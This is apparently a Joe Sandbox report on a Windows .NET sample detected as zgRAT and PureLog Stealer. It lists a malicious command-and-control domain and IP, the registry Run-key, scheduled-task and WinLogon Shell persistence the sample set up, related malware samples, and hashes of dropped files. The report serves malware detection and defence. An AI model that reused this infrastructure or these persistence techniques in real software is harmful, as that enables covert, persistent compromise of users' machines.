http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000016.00000002.1875963931.00000207DAA88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E3D8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900228000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D04C19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 0000001B.00000002.3256027350.000001A190077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://505905cm.n9shka.top/ | PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: malware | unknown
https://contoso.com/License | powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 0000001F.00000002.3063822045.000001FA90077000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/pscore68 | powershell.exe, 00000016.00000002.1875963931.00000207DA861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80001000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | PlZA6b48MW.exe, 00000000.00000002.1749070482.000000000309B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.1875963931.00000207DA861000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.1876879330.000002634E1B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000019.00000002.1847110702.0000025900001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001B.00000002.1853841304.000001A180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001D.00000002.1876981204.0000024D049F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.1845113601.000001FA80001000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002D.00000002.1856049726.0000000003407000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000002F.00000002.1927336033.0000000003573000.00000004.00000800.00020000.00000000.sdmp, WtHZilDMhVnOIkoIfPBLn.exe, 00000038.00000002.1999163067.0000000002D0F000.00000004.00000800.00020000.00000000.sdmp, PlZA6b48MW.exe, 0000003B.00000002.2034332308.00000000029BF000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 0000001F.00000002.1845113601.000001FA80228000.00000004.00000800.00020000.00000000.sdmp | false | | high

IP | Domain | Country | Flag | ASN | ASN Name | Malicious
37.44.238.250 | 505905cm.n9shka.top | France | | 49434 | HARMONYHOSTING-ASFR | true

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1586157
Start date and time: 2025-01-08 19:21:05 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 13s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 70
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: PlZA6b48MW.exe (renamed because original name is a hash value)
Original Sample Name: 32db4bf35b9c2efc730718e2f8cd4fbc.exe
Detection: MAL
Classification: mal100.spre.troj.expl.evad.winEXE@69/82@1/1
EGA Information:
• Successful, ratio: 20%
HCA Information: Failed
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, SIHClient.exe, conhost.exe, schtasks.exe
                                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.246.45
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target PlZA6b48MW.exe, PID 8256 because it is empty
                                                      • Execution Graph export aborted for target PlZA6b48MW.exe, PID 8380 because it is empty
                                                      • Execution Graph export aborted for target PlZA6b48MW.exe, PID 8836 because it is empty
                                                      • Execution Graph export aborted for target WtHZilDMhVnOIkoIfPBLn.exe, PID 8696 because it is empty
                                                      • Not all processes were analyzed, report is missing behavior information
                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                      • VT rate limit hit for: PlZA6b48MW.exe
                                                      Time | Type | Description
                                                      13:22:01 | API Interceptor | 161x Sleep call for process: powershell.exe modified
                                                      13:22:12 | API Interceptor | 3x Sleep call for process: PlZA6b48MW.exe modified
                                                      13:22:22 | API Interceptor | 1x Sleep call for process: WtHZilDMhVnOIkoIfPBLn.exe modified
                                                      18:21:59 | Task Scheduler | Run new task: dllhost path: "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:22:00 | Task Scheduler | Run new task: dllhostd path: "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:22:00 | Task Scheduler | Run new task: PlZA6b48MW path: "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      18:22:00 | Task Scheduler | Run new task: PlZA6b48MWP path: "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      18:22:00 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run PlZA6b48MW "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      18:22:01 | Task Scheduler | Run new task: WtHZilDMhVnOIkoIfPBLn path: "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:22:01 | Task Scheduler | Run new task: WtHZilDMhVnOIkoIfPBLnW path: "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:22:09 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLn "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:22:18 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:22:28 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run PlZA6b48MW "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      18:22:37 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLn "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:22:46 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:22:56 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run PlZA6b48MW "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      18:23:05 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WtHZilDMhVnOIkoIfPBLn "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:23:15 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run dllhost "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:23:34 | Autostart | Run: WinLogon Shell "C:\Program Files (x86)\reference assemblies\Microsoft\Framework\PlZA6b48MW.exe"
                                                      18:23:43 | Autostart | Run: WinLogon Shell "C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:23:52 | Autostart | Run: WinLogon Shell "C:\Program Files\Windows Multimedia Platform\dllhost.exe"
                                                      18:24:01 | Autostart | Run: WinLogon Shell "C:\Users\Default\Application Data\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:24:09 | Autostart | Run: WinLogon Shell "C:\Windows\DiagTrack\Scenarios\WtHZilDMhVnOIkoIfPBLn.exe"
                                                      18:24:18 | Autostart | Run: WinLogon Shell "C:\Users\user\Desktop\PlZA6b48MW.exe"
                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                      37.44.238.250 | r6cRyCpdfS.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 321723cm.renyash.ru/AuthdbBasetraffic.php
                                                      37.44.238.250 | cbCjTbodwa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | whware.top/RequestLowGeoLongpollWordpress.php
                                                      37.44.238.250 | vb8DOBZQ4X.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 228472cm.n9shka.top/PhpauthGamelongpollBigloadbaseLinuxWindowstrackDatalife.php
                                                      37.44.238.250 | 8k1e14tjcx.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 703648cm.renyash.top/provider_cpugame.php
                                                      37.44.238.250 | 4si9noTBNw.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 306039cm.nyashcrack.top/geoGeneratorwordpresswpprivatetempDownloads.php
                                                      37.44.238.250 | Qsi7IgkrWa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 595506cm.n9shka.top/BigloadgeneratortraffictestDatalifeTemp.php
                                                      37.44.238.250 | 4Awb1u1GcJ.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 143840cm.nyashteam.ru/DefaultPublic.php
                                                      37.44.238.250 | s5duotgoYD.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 500154cm.n9shteam.in/eternallineHttpprocessorwindowsDatalifedleprivatecentral.php
                                                      37.44.238.250 | QMT2731i8k.exe | Get hash | malicious | DCRat | Browse | 117813cm.n9shteam.in/ExternalRequest.php
                                                      37.44.238.250 | EQdhBjQw4G.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 861848cm.nyashkoon.ru/providerimageUpdateGameDatalifelocal.php
                                                      No context
                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                      HARMONYHOSTING-ASFR | r6cRyCpdfS.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                      HARMONYHOSTING-ASFR | cbCjTbodwa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                      HARMONYHOSTING-ASFR | vb8DOBZQ4X.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                      HARMONYHOSTING-ASFR | dlr.arm7.elf | Get hash | malicious | Mirai | Browse | 37.44.238.94
                                                      HARMONYHOSTING-ASFR | dlr.mips.elf | Get hash | malicious | Mirai | Browse | 37.44.238.94
                                                      HARMONYHOSTING-ASFR | dlr.mpsl.elf | Get hash | malicious | Mirai | Browse | 37.44.238.94
                                                      HARMONYHOSTING-ASFR | dlr.arm6.elf | Get hash | malicious | Unknown | Browse | 37.44.238.94
                                                      HARMONYHOSTING-ASFR | 8k1e14tjcx.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse | 37.44.238.250
                                                      HARMONYHOSTING-ASFR | roze.sparc.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 37.44.238.73
                                                      HARMONYHOSTING-ASFR | roze.armv4.elf | Get hash | malicious | Gafgyt, Mirai | Browse | 37.44.238.73
                                                      No context
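                                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                      C:\Users\user\Desktop\CwRRQJIe.log | wxl1r0lntg.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                      C:\Users\user\Desktop\CwRRQJIe.log | HaLCYOFjMN.exe | Get hash | malicious | DCRat, PureLog Stealer, RedLine, XWorm, zgRAT | Browse |
                                                      C:\Users\user\Desktop\CwRRQJIe.log | Z90Z9bYzPa.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                      C:\Users\user\Desktop\CwRRQJIe.log | 0J5DzstGPi.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                      C:\Users\user\Desktop\CwRRQJIe.log | 6d86b21fec8d0f8698e2e22aeda3fbd0381300e8a746b.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                      C:\Users\user\Desktop\CwRRQJIe.log | HMhdtzxEHf.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                      C:\Users\user\Desktop\CwRRQJIe.log | Gg6wivFINd.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                      C:\Users\user\Desktop\CwRRQJIe.log | onlysteal.exe | Get hash | malicious | DCRat | Browse |
                                                      C:\Users\user\Desktop\CwRRQJIe.log | t8F7Ic986c.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                                      C:\Users\user\Desktop\CwRRQJIe.log | 544WP3NHaP.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |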
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1917440
                                                                          Entropy (8bit):7.539358678373951
                                                                          Encrypted:false
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          MD5:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          SHA1:616A5C549F6C1C191F82D8CEA82C65E25869241E
                                                                          SHA-256:2FB0B933C97AA9B37E31F7ADF38695E8185B61C7D312C183F05FD4256EF38497
                                                                          SHA-512:577146B764A00BCD3FF34A4EC278C49DB91E7A5EB3647F561455499A7C01C52C513A5283041A378FFB57747E0AD0C93795D7287B5814A01F94612AC81F1828C2
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\PlZA6b48MW.exe, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.Ig.................:..........^X... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...d8... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@X......H.......8...............@....|...W.......................................0..........(.... ........8........E....<...........=...87...(.... ........8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........b...=...........8....r...ps....z*....~....(d...~....(h... ....?.... ....8.......... ....~....{....:....& ....8....~....(\... .... .... ....s....~....(`....... ....~....{....:E...& ....8:...~....:Y... ....8&.....(.
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with very long lines (595), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):595
                                                                          Entropy (8bit):5.894527432325272
                                                                          Encrypted:false
                                                                          SSDEEP:12:6nQhLVW/ia4SMpMjBTc1vOV1BWqO4C+S8lSv1Ge2MDU/IXWaiqz:8QhLV4iBUj2cWP4C+Uv1wyZV
                                                                          MD5:BDC8C10DCBD81A59D67EEAAB407CABDD
                                                                          SHA1:65EBA0977142706166F3918E3D15AB2C332D7654
                                                                          SHA-256:D2603190407FE0269BDF39033D221D7143ABDE184323EDCEAB677DE7B43B5D60
                                                                          SHA-512:FE490D138922720701D728CA372E9325074468F1A1C1D2C3BEC1BCBC1EC1E6896649D1922DF6DA7C5DDA27BC3C98F1999EA8D1F1E8554263DF541190763FFF3D
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with very long lines (873), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):873
                                                                          Entropy (8bit):5.892287647303796
                                                                          Encrypted:false
                                                                          SSDEEP:24:3Ph92ZA11GwFBB9XCYiO6/umT1v3hFXDxRyFXfjP1mwa:3Z92wGuBBJCYw/umT9HYXfjNm7
                                                                          MD5:8712B67DB7AEB6EEB41EA8CF00C07DBA
                                                                          SHA1:087308256FC1FB6816BC7C153223B4D7DE745B2B
                                                                          SHA-256:61746BF6A2FC1E3D119365883380D3BCE7352A024DB7BF34BE9508697FD2C7C4
                                                                          SHA-512:EA3FEB2D1DCCA67A4E6A75F48FEC617307420F1F76FEC1289BBF8CFF17946B3EF0E47C2C5492B98619757FA3882DE4AFE75BBB72E75FFF2BE6806B22A1DD5391
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1917440
                                                                          Entropy (8bit):7.539358678373951
                                                                          Encrypted:false
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          MD5:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          SHA1:616A5C549F6C1C191F82D8CEA82C65E25869241E
                                                                          SHA-256:2FB0B933C97AA9B37E31F7ADF38695E8185B61C7D312C183F05FD4256EF38497
                                                                          SHA-512:577146B764A00BCD3FF34A4EC278C49DB91E7A5EB3647F561455499A7C01C52C513A5283041A378FFB57747E0AD0C93795D7287B5814A01F94612AC81F1828C2
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files\Windows Multimedia Platform\dllhost.exe, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.Ig.................:..........^X... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...d8... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@X......H.......8...............@....|...W.......................................0..........(.... ........8........E....<...........=...87...(.... ........8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........b...=...........8....r...ps....z*....~....(d...~....(h... ....?.... ....8.......... ....~....{....:....& ....8....~....(\... .... .... ....s....~....(`....... ....~....{....:E...& ....8:...~....:Y... ....8&.....(.
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):77
                                                                          Entropy (8bit):5.422376800322775
                                                                          Encrypted:false
                                                                          SSDEEP:3:Knq6xh2IxEoSQdUq8yjVORp9YD9mn:KnPvx1dUqBOP9Ycn
                                                                          MD5:397643F97A8B90C572DABAD73F57F2D8
                                                                          SHA1:8910825F30EFB876D8C98607B56E33BC4B7614B1
                                                                          SHA-256:89074F0F3FC0C1D91B1B3047EAB59028A1F84C4B8E3EA09BC332C68AF59AF406
                                                                          SHA-512:2EF16DE35645CB4E7670F49FE768A63DEC7800D54AC2569099B21CDD8982E40197455A70F5A7EB76A5A5E4A0E2A2467E5D6FF614CB8BD19CE0DF71E53F090332
                                                                          Malicious:false
                                                                          Preview:QPHNakPx0zUb4YTzppWGSWiFYcXnUNraQ1oUowJ5Hx1bGJ2xZbm1fkv3rBy7MmdnI4LDt8K2fb8ef
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1917440
                                                                          Entropy (8bit):7.539358678373951
                                                                          Encrypted:false
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          MD5:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          SHA1:616A5C549F6C1C191F82D8CEA82C65E25869241E
                                                                          SHA-256:2FB0B933C97AA9B37E31F7ADF38695E8185B61C7D312C183F05FD4256EF38497
                                                                          SHA-512:577146B764A00BCD3FF34A4EC278C49DB91E7A5EB3647F561455499A7C01C52C513A5283041A378FFB57747E0AD0C93795D7287B5814A01F94612AC81F1828C2
                                                                          Malicious:true
                                                                          Yara Hits:
                                                                          • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe, Author: Joe Security
                                                                          • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Recovery\WtHZilDMhVnOIkoIfPBLn.exe, Author: Joe Security
                                                                          Antivirus:
                                                                          • Antivirus: Avira, Detection: 100%
                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.Ig.................:..........^X... ...`....@.. ....................................@..................................X..K....`.. ............................................................................ ............... ..H............text...d8... ...:.................. ..`.rsrc... ....`.......<..............@....reloc...............@..............@..B................@X......H.......8...............@....|...W.......................................0..........(.... ........8........E....<...........=...87...(.... ........8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8........0.......... ........8........E........b...=...........8....r...ps....z*....~....(d...~....(h... ....?.... ....8.......... ....~....{....:....& ....8....~....(\... .... .... ....s....~....(`....... ....~....{....:E...& ....8:...~....:Y... ....8&.....(.
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:true
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with very long lines (558), with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):558
                                                                          Entropy (8bit):5.8812755776393475
                                                                          Encrypted:false
                                                                          SSDEEP:12:np9joInXFHnU1a+lRybg3xKTMmxmKFce3Dib7:npKgXpUh1cTMmwY73O7
                                                                          MD5:CF50F440774CE407B0E6B1164C9C4F54
                                                                          SHA1:F7892D8846028500FB09834C097387ED7CAADAFE
                                                                          SHA-256:59EBD12DD3F1AE7AD8F1D99CDCE018A199134770B0B0A5A15B7F11A76346A016
                                                                          SHA-512:7B8760EEB7F4A391C267C6BBA6C12858CEF0629908A3B53FDD6BBFEB04A329E24239BD045A9ED3D9A91D31880514B3ADC7C4F0CF547E774DDC81A8E40113A129
                                                                          Malicious:false
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):1917440
                                                                          Entropy (8bit):7.539358678373951
                                                                          Encrypted:false
                                                                          SSDEEP:24576:PYWx+zBv7JhqvqIsCHeX2RYk1ORuQfAb3ev4XwpgcYZSqu/lYXeHB80K:PAz2H5RYj4QyQZviTu/Ouh
                                                                          MD5:32DB4BF35B9C2EFC730718E2F8CD4FBC
                                                                          SHA1:616A5C549F6C1C191F82D8CEA82C65E25869241E
                                                                          SHA-256:2FB0B933C97AA9B37E31F7ADF38695E8185B61C7D312C183F05FD4256EF38497
                                                                          SHA-512:577146B764A00BCD3FF34A4EC278C49DB91E7A5EB3647F561455499A7C01C52C513A5283041A378FFB57747E0AD0C93795D7287B5814A01F94612AC81F1828C2
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 74%
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):26
                                                                          Entropy (8bit):3.95006375643621
                                                                          Encrypted:false
                                                                          SSDEEP:3:ggPYV:rPYV
                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                          Malicious:false
                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                          Process:C:\Users\user\Desktop\PlZA6b48MW.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):1396
                                                                          Entropy (8bit):5.350961817021757
                                                                          Encrypted:false
                                                                          SSDEEP:24:ML9E4KQwKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNrJE4qtE4KlOU4mZsXE4Npv:MxHKQwYHKGSI6oPtHTHhAHKKkrJHmHKu
                                                                          MD5:EBB3E33FCCEC5303477CB59FA0916A28
                                                                          SHA1:BBF597668E3DB4721CA7B1E1FE3BA66E4D89CD89
                                                                          SHA-256:DF0C7154CD75ADDA09758C06F758D47F20921F0EB302310849175D3A7346561F
                                                                          SHA-512:663994B1F78D05972276CD30A28FE61B33902D71BF1DFE4A58EA8EEE753FBDE393213B5BA0C608B9064932F0360621AF4B4190976BE8C00824A6EA0D76334571
                                                                          Malicious:true
